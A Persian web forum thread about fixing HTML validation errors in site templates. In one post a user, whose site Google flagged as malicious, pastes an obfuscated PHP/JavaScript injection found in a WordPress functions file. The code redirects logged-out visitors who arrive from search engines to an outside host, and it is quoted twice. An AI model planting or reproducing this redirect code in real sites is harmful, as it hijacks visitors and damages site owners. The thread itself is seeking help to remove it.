• پایان فعالیت بخشهای انجمن: امکان ایجاد موضوع یا نوشته جدید برای عموم کاربران غیرفعال شده است

پاسخ به سوالات و رفع مشکلات استاندارد سازی

GraphX

Registered User
لایک‌ها
7,756
سلام دوستان
دیدم یکی از دوستان لطف کردن و آموزش استانداردسازی و رفع اررور های کد نویسی رو دارن آموزش میدن
به همین خاطر تصمیم گرفتم این تاپیک رو بزنم تا به نوعی منم تجربیاتمو در اختیار بقیه دوستان قرار بدم

از دوستان هر کسی هر سوالی داره بپرسه تا در اسرع وقت پاسخ بدم
موفق باشید

rezaki

Registered User
لایک‌ها
183
سلام
قالب من 95 تا ارور داشت که الان شده 5 تا لطفا راهنمایی کنید تا این 5 تا ارور رو هم رفع کنیم بره پی کارش.

این عکس ارورهاست:
q72kpbs6cztcjefhtnj.gif

GraphX

Registered User
لایک‌ها
7,756
سلام
قالب من 95 تا ارور داشت که الان شده 5 تا لطفا راهنمایی کنید تا این 5 تا ارور رو هم رفع کنیم بره پی کارش.

این عکس ارورهاست:
مشاهده پیوست 108949

سلام

پیغام اول واسه اینه که تگ div بسته نشده که باید با </div> ببندیش
پیغام دوم واسه اینه که تگ td بسته نشده که باید با </td> ببندیش
پیغام سوم واسه اینه که تگ table بسته نشده که باید با </table> ببندیش

rezaki

Registered User
لایک‌ها
183
ممنون تمام مشگلات قالب حل شد فقز 2 تا مشگل مونده که اونم اشگال از ادیتور وردپرسه یکم سایت رو بروز کنم با اومدن مطالب جدید به صفحه اول مشگلش حل میشه ممنون

kooolak

Registered User
لایک‌ها
559
سلام

گوگل سایتم رو مخرب شناسایی کرده

گشتم و رسیدم به این کد توی فانکشن همینی که نوشتم رو پاک کنم کافیه ؟

?><?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>

GraphX

Registered User
لایک‌ها
7,756
ممنون تمام مشگلات قالب حل شد فقز 2 تا مشگل مونده که اونم اشگال از ادیتور وردپرسه یکم سایت رو بروز کنم با اومدن مطالب جدید به صفحه اول مشگلش حل میشه ممنون

خواهش می کنم موفق باشی

GraphX

Registered User
لایک‌ها
7,756
سلام

گوگل سایتم رو مخرب شناسایی کرده

گشتم و رسیدم به این کد توی فانکشن همینی که نوشتم رو پاک کنم کافیه ؟

?><?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>

سلام
به احتمال قوی مشکل از همین کده اما واسه اطمینان فایل فانکشنتو قرار بده تا یه نگاهی بهش بندازم

YasDL.com

Registered User
لایک‌ها
74
سلام

من خیلی روی قالبم کار کردم

ابتدا 65 warning داشت که با تغییرات شد 13
اما اررور هاش دو برابر شد؟!

می تونین به من کمک کنید

[Invalid] Markup Validation of [url]http://www.yasdl.com/ - W3C Markup Validator[/url]

پیشاپیش ممنون از لطف شما

GraphX

Registered User
لایک‌ها
7,756
سلام

من خیلی روی قالبم کار کردم

ابتدا 65 warning داشت که با تغییرات شد 13
اما اررور هاش دو برابر شد؟!

می تونین به من کمک کنید

[Invalid] Markup Validation of ياس دانلود | دانلود کلیپ، موبایل، بازی و نرم افزار - W3C Markup Validator

پیشاپیش ممنون از لطف شما

سلام
خیلی از ارور ها قبلاً تو این تاپیک توضیح داده شده
اونا رو رفع کن ، جایی به مشکل برخوردی راهنماییت می کنم

بالا